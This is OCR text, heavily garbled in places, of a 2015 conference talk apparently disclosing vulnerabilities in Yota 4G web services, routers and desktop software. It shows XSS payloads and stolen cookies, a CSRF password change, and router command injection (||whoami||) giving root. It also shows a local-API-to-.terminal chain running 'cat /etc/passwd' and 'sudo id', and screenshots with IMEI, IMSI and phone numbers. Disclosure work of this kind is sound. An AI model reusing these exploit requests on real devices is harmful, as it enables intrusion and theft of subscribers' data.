— -— Vulnerabilities in the software of Yota 
telecommunication equipment 
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гЕкоО ТЕН 
WHOAMI? 


е Security researcher at HeadLight Security 

е “Attacking MongoDB" at ZeroNights 2012 

е “Database honeypot by design" at Defcon Russia 

е Worked at Positive Technologies since 2012 to 2015 
* "Hacking routers as Web Hacker" at Defcon Moscow 


е Member of DC 7499 


ZERO ЕЕ 
WHATIS 46 IN 2015? 


Modems, routers, mobile routers, phones, etc 


WHAT IS YOTA? 
Most used YOTA devices: 


Yota Lua (simple usb modem) 


E 


Yota Many (mobile router) 


Yota Swift (modem + wifi router) 


ж 


WHAT IS YOTA? 


Yota web interface: 


eee <> m à my;yota.ru © оао м 


Чат Профиль Выход 
English 


Yota 


Профиль Банковские карты Платежи Yota 4G 


С помощью регулятора скорости вы можете настроить скорость доступа в интернет, выбрать 
условия подключения или поменять их в любой момент без дополнительной оплаты. 

Это выгодно - вы платите только за то, что вам действительно нужно. 

Стоимость услуг от 0 до 1400 рублей в месяц. Трафик не ограничен. 


SIM Yota Баланс | 48 


py6. 


Текущие 350 64 Бес платно Пополнить счет с 


условия E привязанной карты 
дней осталось Кбит/сек (макс.) 


ФО MasterCard ... 1337 


— a^ >>>> выберите безлимитный тариф Быстрее me руб. 


Новые Переместите регулятор скорости для выбора новых условий подключения. 
словия Доплата не потребуется. При увеличении максимальной скорости 
y количество оставшихся дней уменьшится, при снижении — увеличится. 


Оплатить с другой карты 
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2015 


WHAT IS ҮОТА? 


Yota software: 


Приложение Yota (Win) 
Совместимо с Windows 8, Windows 7, Vista, XP (32-bit) 


27 Mb 
Скачать 


Приложение Yota (Mac) 


Совместимо с Mac OS Х 10.5 Leopard (32-bit), 10.6 Snow Leopard (32-bit), 10.7 Lion, 10.8 Mountain 


Lion, 10.10 Yosemite 


23 Mb 
Скачать 


90-91-5065 в TD 


Подключите устройство 


Подключите устройство A 


Баланс Баланс 
Войти в Профиль 
Задать вопрос 

Статистика 


Задать вопрос 


Статистика 


WHAT CAN WE ATTACK? 


* Yota personal cabinet (XSS, CSRF, Info Leakage) 
е Yota Many (Sensitive Info Leakage, RCE) 
е Yota Swift (RCE) 


* Yota Access (Sensitive Info Leakage, RCE) 
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WHAT CAN WE ATTACK? 


* Yota personal cabinet (XSS, CSRF, Info Leakage) 
е Yota Many (Sensitive Info Leakage, RCE) 
Yota Swift (RCE) 


* Yota Access (Sensitive Info Leakage, RCE) 


YOTA SERVICES 


Even 1 XSS can compromise all your data 


eoe | © Redirect їо payment page х \ + 
at — 


(«€ @ = e5"><scriptmalert(document.domain)<%2fscrip>142 — X | С, Поиск ta $ À © &ы» = 


Передача данных с my.yota.ru... 
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YOTA SERVICES 


Even 1 XSS can compromise all your data 


eee À С https://myyo..locale=ru_RU * Ф http://yota.hl.../bug-xss.html X | + 


(Ж |6, | https://my.yota.ru/pluto/remote/roox.socialmappings.selfcare?style-123" onError%3d"alert(document.cookie) X (А Поиск * 8 + а Ө #ыр- = 


JSESSIONID=94badaedc28fc9fb 1 bOfbf01 928b; FwdLogin=188.93.215.12; _да=СА1.2.1057339261.1448364670; 
.. utma-3126200.1057339261.14483646 X 
... utmz-3126200.1448365017.1.1.utmcsr-(direct)lutmcen-(direct)lutmcmd-(none);  utmt-1; ym uid-1448365018514380479; 
.ym isad-0; ym visorc 23410183-w; amlbcookie-rxsso1; МӘС ttp-zpubsv-mcwtfswfs- 
iuuq-8080-ffffffffü908960e45525d514158455e445a4a4229a0; dlbcookie-rxlogin1 ; 
iPlanetDirectoryPro-AQIC5wM2LY4SfcxaOmhPQh20Ba9F- 
E.*AAJTSQACMDIAAINLAAK2NzUxODCAMTCAAIMxAAIWwMQ..* ; 
JSESSIONID-94bd6c72a33702eb9ea0acf236d7 


Передача данных с my.yota.ru... 


...Dut | found 2 of them ;) 


| 2015 


ZERO ЦЕНЕ: 


YOTA SERVICES 


“Х55 is boring, it can’t see my password" 


eoe 45 http://yota.hl.../bug-xss.html * / Redirect to payment page х \ + 
ai OH 


| € а тате src="https://my.yota.ru/selfcare/login" опи ea Q, Поиск ўї | &e $ А © &NoProxy~ = 


Yor saved pass: 1231234 


ж” 


Don’t be so sure, if you save your passwords іп ҒҒ 


y Vo az пит 
РА: Ё 1 = Г? / да, = ‘ ь “ с ' \ 


YOTA SERVICES 


Just another CSRF with password change 


eoe ЦБ http://yota.hl.../bug-xss.html 


© @  https://my.yota.ru/selfÍcare/setPassword 


У Изменение пароля 


Yota 


Для вашей безопасности измените пар 


ы Yota - Смена пароля | . 
eoe untitled 
а Поиск 


Сохранить 


3 selection regions 


Thnx Yota support with this bug ;) 


Tab Size: 4 


UNREGISTERED 


СЕТ 


/pluto/remote/roox.balance.vk?viewer i d-D7622282Ekme th 
od-balance HTTP/1.1 
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YOTA SERVICES 


Get user's balance by VK id ;) 


eoe Burp Suite Professional v1.6.30 - licensed to Yandex, LLC [5 user license] 


Burp Intruder Repeater Window Help 
[Comparer 


Intruder | Repeater | Sequencer 


Spider | Scanner 


Target | Proxy 


Б Target: https:/ /my.yota.ru 


Request Response 
Headers | Raw [ Headers | Hex | | Hex | 
a HTTP/1.1 200 OK a 
/pluto/remote/roox.balance.vk?viewer i = 01612261 meth X-Powered-By: YOTA/3.0 
od=balance HTTP/1.1 Server: YOTA/3.0 
Host: my.yota.ru Pragma: no-cache 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X Cache-Control: n 


Accept: application/json, text/javascript, /*; Expires: 

q-0.01 | Last-Modified: T 

Accept-Language: ru-RU, ru; q=0.8, en-US; q=0.5,en;q=0.3 Content-Type: te К 

Accept-Encoding: gzip, deflate ntCoent-Length: 29 

X-Requested-With: XMLHttpRequest Date: Tue, 24 Nov 2015 12:44:17 GMT 

Connection: keep-alive Set-Cookie: FwdLogin=188.93.215 27 expires-Wed, 25 Nov 


2015 12:44:18 GMT; domain=yo 
Content-Length: 29 


{ "Ба1апсе" : 8, 


v v 


? | < | | + | > | Туре a search term 0 matches | ? | < | | + | | > | Type a search term 0 matches 


Done 486 bytes | 1 141 millis 


10.10; rv:40.0) Gecko/20100101 Firefox/40.0 post-check=0, pr j s ay EL қ ecd 
ipii iiie а үле Чага xpires: wed, 3; | Balance": r Success 


ls true | 


NIGHTS 
YOTA SERVICES 


OK, that’s all is really boring. Go next! 


eee Ч? Yota-Yota4G x / HB һгір://у..х<< ті ж \ Р 
(Ж) | yota.hisec.ru/bugs/bug-xss.html cC p» = 


Logged in my.yota.ru: True 

First & Last name: cyber punk 
Email: cyberpunkych&i cloud.com 
Phone: +7 (965) 314 01 59 

Balance: 48 руб. 

VK: http://vkontakte.ru/1d17642261 
FB: No account 


Дд 
К } 


WHAT CAN WE ATTACK? 


* Yota personal cabinet (XSS, CSRF, Info Leakage) 
* Yota Many (Sensitive Info Leakage, RCE) 
е Yota Swift (RCE) 


* Yota Access (Sensitive Info Leakage, RCE) 


YOTADE DEVICES 


Just press button and go 4G! 


СА 


..Or insert into USB port 
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ZERO METE 
YOTA DEVICES 


Web admin panel looks good 


e @_http://10.0.0..ug-many.htmi JI I" Yota Many x ш 
ӨС 10001 ^| € ба поиск де + 4 Ө kw Е 


Hmm... 
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2015 


, i г 5 [ EPS) cum 
НЯ HT de 
AS TS & 


$ % y a Oe 


YOTA DEVICES 


Wow, such referer check, nice protection! 


eoe Burp Suite Professional v1.6.30 - licensed to Yandex, LLC [5 user license] 


Burp Intruder Repeater Window Help 


| со Cancel || <i» | | >|" Target: http://10.0.0.1 (“| ? 
Request Response 

вом риалы [Headers [Hex | (sam Headers [Hex 
GET m HTTP/1.1 200 OK ‘= 
/devcontrol?callback-jQuery17204916625038231476 Cache-Control: n в рен = а 
1448367297234&command-getStatus& -1448367347400 Expires: 28 Apr "Huron ret ЕТЕТ = 
HTTP/1.1 Last-Modified: 


Host: 10.0.0.1 Content-Length: 
x-Requested-With: £MLAttpReques: GMT 


Server: lighttpd/1.4.33 


Cookie: 


YRlanau 


cmascript, Wrong referer: 


ge=ru o1 http://yota.hisec. ru/ 


Accept-Language: 


ru-RU, ru; q=0.8, en-US; q=0.5, en; q=0.3 
scept-Encoding: gzip, deflate 

X-Requested-With: XMLHttpRequest 

Cookie: YRlanguage-ru 

Connection: keep-alive 


М М 


| ? | | < | | + | | жə Туре а search term О matches | ? | | < | | + | | > | Type | 0 matches 


215 bytes | 1 024 millis 


Ready 


eoe Burp Suite Professional v1.6.30 - licensed to Yandex, LLC [5 user license] 


Burp Intruder Repeater Window Help 


„ыы LE ORE Ly Ly gm bp ES: FE zh ьа ш a № izle gm "ipe Бей ъ= eee EUH "im 
2 
Referer: http: #:10.0.0.1. vota.hlsec.ru/ Target http://10.0.0.1 |4) (2) 
= on meuuts»t Response 


HTTP/1.1 200 OK 
Е Cache-Control: no-cache 
1448367297234 &command= getStatus& -1448367 347400 Expires: 28 Apr 1970 21:17:51 GMT 
HTTP/ Last-Modified: 
Host: .0.0. Content-type: text/javascript; 
Mozilla/5.0 (Macintosh; Intel Мас charset=utf-8 
rv:42.0) Gecko/20100101 Date: Tue, 24 Nov 2015 12:18:48 

Firefox/42\0 GMT 
Accept: text/javascript, Server: lighttpd/1. 
application/Yavascript, application/ecmascript, Content-Length: сы 
application/xvecmascript, */*; q-0.01 
Accept-Language: jQuery1720491662503823 
ru-RU, ru; q=0.8, en-US; q=0.5,en;q=0.3 2937234 
Accept-Encoding:\gzip, deflate { 
X-Requested-wWith:\ XMLHttpRequest "connected": true, 
Referer: http:// .yota.hlsec.ru/ "statusDescr":"Connected", 
Cookie: YRlanguage=ru "networkType":"4G" 
Connection: keep-alive "extNetworkType":"EUTRAN", 

"numWiFiUsers":[1,0,0,0], 
v "wiFiEnabled":[1,1,0,0], 


ЕЗ ЕЗ (+) fa) | Type a search term 0 Gabe (2) ES (+) (>) Type 0 SPEI 


1015 bytes | 50 millis 


NIGHT 
YOTA DEVICES 


Router. Bugs. Hmm. RCE? 


eoe Burp Suite Professional v1.6.30 - licensed to Yandex, LLC [5 user license] 
Burp Intruder Repeater Window Help 


| Go Cancel | ( «iv Target: http://10.0.0.1 (“| 21 


Request Response 


[иан Params [Headers rex) әм Headers [vex | 


GET 


A HTTP/1.1 200 OK 


n 
F.cgi ?раде-а)ах.азрбастіоперіпдіпгі- Наше б-аП|<сеасс Cache-Control: no-cache 
7 HTTP/1.1 


Expires: 28 Apr 1970 21:17:51 GMT 
Last-Modified: 

Content-Type: text/html 

Date: Tue, 24 Nov 2015 12:21:09 GMT 


Server: lighttpd/1.4.33 
Accept-Language: ru-RU,ru;q=0.8,en-U$;q=0.5,en;qg=0.3 Content-Length: 80 
deflate 


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 05 X 10.11; 
Gecko/20100101 Firefox/42.0 


Accept: */* 


l.yota.hlsec.ru/bugs/bug-many.html 


Linux 9615-cdp 3.0.21+ #1 PREEMPT Tue Dec 16 14:38:17 CST 2014 
armv71 GNU/Linux 


YRlanguage=ru 


Connection: keep-alive 
Cache-Control: max-age=0 


v 


v 


П matrhac 


О matches 


m " 3 : 283 bytes | 96 millis 
l*page-a] dx. aspá acti оп=рі ngá url=||unamet20-a| |& Feaz0 
T 


GET 
/сді-Біп/вүнсоп 
n-l&timez1.1.15 


f.cg 
87 


HTTP/1.1 


Of course! 


2015 


NIGHTS 
YOTA DEVICES 


Router. Bugs. Hmm. RCE? 


Burp Suite Professional v1.6.30 - licensed to Yandex, LLC [5 user license] 


Burp Intruder Repeater Window Help 


Go Cancel < |" > |" 2 


Target: http://10.0.0.1 М ? 
Request 


Response 
Raw | Params | Headers | Hex | Raw | Headers ac 
( А HTTP/1.1 20 a 
conf.cgi?page=ajax.aspéaction=pingéurl=| |whoami | |&reason=16 Cache-Control: no-cache 
7 HTTP/1.1 Expires: 28 Apr 1970 21:17:51 GMT 
1 Last-Modified: 
Мо2111а/5 (Macintosh; Intel Мас OS X rv:42.0) Content-Type: text/html 
20100101 Firefox/42.0 Date: Tue, 24 Nov 2015 12:21:48 GMT 
куж Server: lighttpd/1.4.33 
iccept-Language: ru-RU, ru; q=0.8, en-US; q=0.5, en; q=0 Content-Length: 5 
кы Аана 7 gzip, deflate 
Referer: http: 10.0.0.1.yota.hlsec.ru/bugs/bug-maàny.html root 
Cookie: YRlanguage= ru 
Connection: keep-alive 
Cache-Control: max-age=0 
Y v 
? | < + > Type a search term 0 matches ? | < | + > | Type a search term 0 matches 
ml ЕЕ 
, ; | ‚ Е u | | : | 207 bytes | 128 millis 
'"cgi-bin/sysconf.cgi?page-ajax.asp&action-ping&url-| | whoami | |&reason= 
Fame 1 1 


ене T 


We are root. Classic. 


mn 
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ZERO ТЕ 
YOTA DEVICES 


Final result: 


Ө © /w hittp:10.00..ug-many.htmi х | Y Yota Many x | + 


|Ж 4 10.0.0.1.yota hisec.ru/bugs/bug-many.html = (О Поиск її В ЖІ å © Бъ.- = 


Wifi hotspot name: ATOL 


Wifi hotspot password: ATOLATOL 

Yota ip: 10.164.18.240 

Yota IMEI: 35891604297118 

Yota IMSI: 250110101308953 

Your internal ip: 10.0.0 .23 

Yota's “uname -a : Linux 9615-cdp 3.0.21+ #1 PREEMPT Tue Dec 16 14:38:17 CST 2014 armv?l GNU/Linux 


Other devices, such as Yota Swift affected too! 
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D 
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WHAT CAN WE ATTACK? 


* Yota personal cabinet (XSS, CSRF, Info Leakage) 
е Yota Many (Sensitive Info Leakage, RCE) 
Yota Swift (RCE) 


* Yota Access (Sensitive Info Leakage, RCE) 


2015 


NIGHTS 
YOTA SOFTWARE 


Software? But I’m just web script-kiddie 


Өз YotaAccessService.app - 0,22 
7 €) vota 0,2 0,3 Her 
.  QTKitServer-(458) Yota 0,0 - Her 
eoe Yota (458) г 
Родительский процесс: launchd (1) Пользователь: cyberpunkych (501) 
Группа процесса: Yota (458) 
% ЦП: 0,10 Последние сбои: 0 


Память Статистика OTKPBHITEIE ее рыш” 


file M.localstorage 
-»8x77d8cda4247b59bb 
/System/Library/CoreServices/SystemAppearance.bundle/Contents/Resources/ 
VibrantLightAppearance.car 
-»8x77d8cda42a16723b 
-280x77d8cda42a1672fb 
localhost:commplex-main 
-»8x77d8cda428d4b8cb 
-»8x77d8cda42a1670bb 
-»8x77d8cda42a16717b 
-»8x77d8cda42a166dbb 
-»8x77d8cda426d94c1b 


Выборка || Завершить 


< © 


127.0.0.1 


Q 
о 
> 
[m] 


YOTA 


Подключите устройство 


Длительность сеанса: 
Макс. скорость за сеанс: 
Текущая скорость: 
Получено/Отправлено: 
Сигнал: 

IP-anpec: 

BSID: 


Идентификатор: 


Статистика > 


Wow, web interface оп 5000 port. Interesting... 


YOTA SOFTWARE 


Oh, this web again. I love it. 


eoe GET request to http://127.0.0.1:5000/events?lastEventid=&r=5296692676227206 


(ыезікш-) next) (action) 


Request | Response | 


HTTP/1.1 200 OK . . = . r 
Connection: keep-alive 


Cache-Control: no-cache 
Content-Type: text/event-stream 
Date: D°N , 24 Рич Ðt. 2015 12:55:55 GMT 


event: storagelnitEvent 

data: {"LAST ROSS RESULT": "{\"cm\":{\"welcomeScreen\":\"\", \"additionalText\":{\"en_US\":\"Network 

segment is temporary overloaded\",\"ru RU\":\"B этом районе сеть временно 

перегружена\" }, \“menuTurboText\":{\"en_ US\":\"Request coverage improvement\",\"ru RU\":\"OcTaByTEe 

заявку на улучшение 

качества\" }, \"turbolIcon\":\"TB Mani", \"traylcon\":\"Tray Yellow\", \"trayStatusText\":{\"en US\":\"N 

etwork segment is temporary overloaded\",\"ru RU\":\"B этом районе сеть временно 

neperpyxena\"},\"mainText\":{\"en US\":\"Connected to Yota\",\"ru ВО\":\"Подключен к 

Yota\"}, \"showTurboButton\":1, \"turboText\":{\"en US\"s\"\",\"ru_ ROY": \"\"}, \"additionalLink\": { \"е 

n_US\":\"http://www.yota.ru/bsload?{bs status}\",\"ru_RU\":\"http://www.yota.ru/bsload?{bs status}\ 
}, \"barsIcon\":\"Bars Warning\", \"flyoutTitleText\":{\"en US\":\"Network is temporary 
overloaded\",\"ru_RU\":\"CeTe временно 

перегружена\"}, \"trayHintText\":{\"en_ 054: А "іш ROY" ы”, \"turboLink\":{\"en_US\":\"http://w 

ww.yota.ru/bsload?[bs status}\",\"ru RU\":\"http://www.yota.ru/bsload?{bs status}\"}},\"locales\": [ 

\"en_US\",\"ru_RU\"], \"turboWidget\":{\"buttonAction\":{\"en USA": "4%, ru RUP: VP" yj, \"buttonlcon 

Us", X''showButton\":0, \"buttonText\":{\"en US\"S\"V\",\"ru RUN": А" " } }, \'bsinfoi":{\"bsStatus\":9 

9, \"avaUsers\":56, \"reqionId\":\"MOSCOW\"}}","“com.roox.cm.Common.App.NewsForm. Properties.unit.Heigh M 


іші |і ші | ee | om 


m SOF FTWARE 


Send | request and wait f for reply on :5000/ events! 


+ 
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ҮОТА yota_event_logging.ntm + 
get info send info 


01. Report Generation Time (Local): 24.11.2015, 16:10:34 


02. Report Generation Time (UTC): 24.11.2015, 13:10:34 

15. YOTA Version: YD3.1.0 

16. YOTA State: No Device 

17. Operating System: Mac OS X 

18. Operating System Version: 10.11.1 (15B42) 

өсе 1. cyberpunkych@cyberpunkych: python (Python) 


{"id": "сот. roox.cm.account . update" , "data" : {"context":{"slider":{"isVisible”: false, “isEnabled": false, “backSlider":{ 
“value":-1,"“isVisible": false}, “applyButton": {"text": "Подключить", "15Епаб1еа" ; false}}, “hint":{"isVisible":false}, "р 
roduct" :{"caption":"Tekyume условия" , “actualityDate":"", "і ѕЕпаБ1еа" ; false, “isVisible": false, “price":{"caption": "Ст 
оимость" , “value":""}, "speed": {"caption": "Скорость", “value":""}, "time": {"сар Топ" ; "Времени осталось" , "value":"' : 
offer" :{"caption":"Hosue условия", “actualityDate":"","isVisible": false, “price”: "caption" : "Стоимость" , "value" ;""?, 
"speed" : ("caption" ; "Скорость" , "value" :""} ,"41те" ; {"сар Топ" ; "Времени останется" , "value" ;""1T, "balance" :{"isVisible 
“:true, “caption”: "Баланс" , “value":""}, "turbo" : ("isVisible":false,"isEnabled":false,"caption":"BkymouWTb макс. скоро 
сть", "offers": []}, “selfcare":{"isVisible":true, "text": "Войти в Профиль"}}},"__теѕѕадеѕЅоигсе" ; "cd3520e2-7cf9-1489-6 
6a5-83ec2fa87a16"} 


{"id":"com.roox.cm.Common.App.Events.SummaryCollectingStarted", "data" :{"kind":2,"isDetailed":false}} 


("id":"com. roox. cm. Common. App . GenerateSummary" , "data" : {"isDetailed":false,"kind":2};,"_ messageSource" ; "54f35129-49 
57 -bafe-3fa0-e29acfdd88db"1 


("id":"com. roox. cm. Common. App. Events . SummaryCollectingCompleted" , "data" : ("kind" :2, "isDetailed":false,"content":"01 
. Report Generation Time (Local): 24.11.2015, 16:11:04\n@2. Report Generation Time (UTC): 24.11.2015, 13:11: 
@4\n\n15. YOTA Version: YD3.1.@\n16. YOTA State: Мо Device\n17, Operatin 
g System: Mac 0$ Х\п18. Operating System Version: 10.11.1 (15B42)*n19. Computer Manufactur 
ег: Apple\n2@. Computer Model: MacBookPro9,2\n\nYOTA Full Version: 
Master-147. 6446 auto. YD RUS (YD .RUS)NnDeveloped by RooX (TM) ими. rooxteam.com\n"}} 


YOTA SOFTWARE 


k, we can read some data, and so? 


eoe Burp Suite Professional v1.6.30 - licensed to Yandex, LLC [5 user license] | 


Sequencer | Decoder | Comparer | Extender | options [ les | 


Go Cancel Target: Вир: / /localhost:5000 2 ? 
Request Response 
Raw | Params | Headers | Hex Raw | Headers | Hex | 


.1 


5.0 (Macintosh; Intel Мас OS Х 10.11; rv:42.0) 


Сог -Туре: 
application/json 


0100101 Firefox/42.0 sont 
Accept: */* 
Connection: keep-alive 


Accept-Language: ru-RU, ru; q=0.8, en-US; q=0.5,en;q=0.3 
24 DHDHÀ 


:pt-Encoding: gzip, defla 
application/x-www-form-urlencoded 
//10.0.0.1.yota.hlsec.ru/bugs/yota event logging.html 


ferer: ht 


ntent-Le 


3fa0-e29actddsadb\"}"} 


v 


` 4 = = v 
iled V": ШШШ, \"kind\":2 ], ^" messageSpourcex" :X"54f 29-4 | 
im tches ? « * > 0 matches 


165 bytes | 1 009 millis 


| Done 
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My lovely game - playing with parameters & requests! 


CA 


01. 
02. 


95. 
06. 
07. 
08. 


15. 
16. 
17. 
18. 
19. 
20. 


30. 
31. 
32. 
33. 
34. 


A 
| 


puma 
| К 


> 


| | EA 
AMEN 
WB | 
ТА! 


В 


== 
: 


Report Generation Time (Local): 
Report Generation Time (UTC): 


IP Address: 

ID: 

ECGI: 

Signal (SINR/RSRP): 


YOTA Version: 

УОТА State: 

Operating System: 
Operating System Version: 
Computer Manufacturer: 
Computer Model: 


WWAN Technology: 
Network: 

ECGI: 

Frequency: 

Signal Level {777 


жжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжжж+ 


1 oct 100: flags-8049 mtu 
№ options=3 


inet6 


16384 


111 prefixlen 128 


inet 127.0.0.1 netmask Oxf f000000 
inet6 Те80::1%100 prefixlen 64 scopeid 0x1 
inet 127.94.0.1 netmask Oxf f000000 


nd6 options=1 
9110: flags=8010 mt 
5110: Пад5=6<> mtu 
епд: flags=8863 mtu 
options=10b 
ether a8:20:66:21 
nd6 options=1 
media: autoselect 
A status: inactive 
хе eni: flags=8823 mtu 
ether 20:c9:d0: cd 
nd6 options-1 
media: autoselect 
status: inactive 
en2: flags-8963 mtu 
options-60 
ether d2:00:16:71 
media: autoselect 
status: inactive 
fwü: flags-8822 mtu 


lladdr a8:20:66:ff:fe:67:16:62 


media: autoselect 
status: inactive 


u 1280 
1280 
1500 

:97:58 


(попе) 


1500 
:fa:af 


() 
1500 


:66:20 


4078 


р2р0: flaqs-8802 mtu 2304 


25.08.2015, 13:09:56 
25.08.2015, 10:09:56 


19.134.199.132 
0101259677 
25011F271604 
2/-95 


YD3.1.0 
Connected 

Mac 0S X 
10.10.5 (14F27) 
Apple 
MacBookPro9, 2 


УОТА SOF FTWARE 


OK. WHERE IS RCE?!1 
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YOTA SOFTWARE 


Here. 


Request Response 

(Ram [Params | Headers нех | [кан [Headers | Hex | 
POST /action HTTP/1.1 А НТТР/1.1 200 OK 
Host: localhost:5000 


User-Agent: Mozilla/5.0 
Gecko/20100101 
Accept: */* 


(Macintosh; 
Firefox/42.0 


Intel Мас 05 


Х 10.11; rv:42.0) 


Content-Length: 2 
Cache-Control: 
Content-Type: 


Connection: 


no-cache 


application/js 


keep-alive 


Accept-Language: ru-RU, 


ru; q=0.8, en-US; q=0.5, en; q=0.3 Date: р: , 24 Бы Ht. 2015 13:28: 
Accept-Encoding: gzip, deflate 
Content-Type: application/x-www-form-urlencoded {1} 


Content-Length: 
null 
Connection: keep-alive 
Pragma: cache 
Cache-Control: 


161 
Origin: 


по- 
no-cache 


ot Si message","data":"{\"id\":\"com.roox.cm.Common.App.OpenUrl\" 


text\"}"} 


‚\"аата\": 
__messageSource\":\"any_ 


["id":"message" 
ТЕТ": 
іїехі х" |") 


,."data":"{ "id": "сом. горх. ст. Common. App -penürl", 
AUT, LUN 


S" datas" : 
.messageSourcei":i"any | 


YOTA SOFTWARE 


Short instruction for OS X: 


From opening file to full RCE 


• Sopen ftp://anon@1.1.1.1/ - will mount ftp to /Volumes/1.1.1.1/ 


e terminal file could exec any commands after opening 
e Sometimes you can get root without any exploits! (remember ‘sudo’ feature in OS X ©) 


eoe a yota rce.terminal UNREGISTERED 


displaypolicyd:»:244:244:Display Policy Daemon:/var/empty:/usr/bin/false [| 
astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false 

Krbfsskckt24h:-2:Mebbe rp о 

.gamecontrollerd:»:247:24 

.mbsetupuser:*:248:248:Se 

_ondemand:*:249:249:0n De 


e B 
.nsurlstoraged:*:243:243:NSURLStorage Daemon: /var/empty:/usr/bin/false | 


yota_rce.terminal 


йе quc раа EE ga RU. айы ы _хѕегуегӣосѕ:ж:251:251:05 PWND!!1 
<key>WindowTit 1е</ key> _wwwproxy:*:252:252:WWW Е 
4 : cyberpunkych@cyberpunkych 
<string>Hacked! ! !</string> : iss Отменить ок | 
' Darwin cyberpunkych-2. loc 
<key>CommandSt ring</key> 3:46 PDT 2015; root:xnu-3247.10.11~1/RELEASE_X86_64 x86 64 
<string> < cyberpunkych@cyberpunkych-2|~ 
) sudo id 
cat /etc/passwd; uid-0(root) gid=@(wheel) groups=@(wheel),1({daemon) ,2(kmem),3(sys),4(tty),S(opera 
: Yota RCE tor),B(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccount 
uname à; s),80(admin),33( appstore),98( lpadmin),100( lpoperator),204( developer),395(com Е 
sudo id Wait edge ЧЕ nly Чы lero E cr амы ананы ,399(com.apple.ac 
ait... cess ssh),701(com.apple.sharepoint.group.1 
osascript -e 'display dialog "PWND!!1"' Wait for it... cyberpunkychecyberpunkych-2|» — | | 
/ t А PWNED!!1 ) osascript -e ‘display dialog "PWND!!1"' 
«/string» " | 
</dict> 
</plist> ] 


6 lines, 154 characters selected Tab Size: 4 Plain Text 


ZERON OTE 


YOTA SOFTWARE 


Video here. 


ZERO Б 
CONCLUSION 


Test yourself here - http:/ /yota.hlsec.ru/ 


Questions? 


4» yota.hisec.ru/#1 е | Поиск ў Эха @ & № Proxy = 


ОСТОЯНИЕ ПРОВЕРКИ 


CONCLUSION 


Thnx: 


e Oleg Kupreev ((0090h) 
e Sergey Vishnyakov (@n3twOrk) 
* Timur Yunusov (@a66at) 
* Dmitry Evteev (@devteev) 
e Vyacheslav Egoshin (@vegoshin) 
e  PsychOtr1a (© PsychOtr1a) 
e DC7499 and 2600 community 
e Ман Austin (From XSS to RCE) 


Thank you for the attention! 


@cyberpunkych 


